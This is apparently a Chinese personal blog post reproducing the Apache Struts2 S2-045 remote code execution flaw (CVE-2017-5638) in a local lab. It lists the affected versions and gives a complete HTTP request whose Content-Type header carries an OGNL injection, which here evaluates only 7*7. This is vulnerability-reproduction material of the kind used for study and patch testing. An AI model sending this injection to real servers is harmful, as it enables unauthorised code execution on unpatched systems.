joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

S2-045 远程代码执行漏洞（CVE-2017-5638）

发表于 2022-02-18 | 分类于漏洞复现 |

S2-045 远程代码执行漏洞（CVE-2017-5638）

受影响的版本：Struts 2.3.5 - Struts 2.3.31、Struts 2.5 - Struts 2.5.10

参考：

漏洞复现

容器运行后，访问http://192.168.44.132:8080可以看到上传页面的示例。

通过以下请求验证漏洞：

POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Length: 0
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',7*7)}.multipart/form-data

7*7已成功执行：

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2022/02/18/S2-045/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%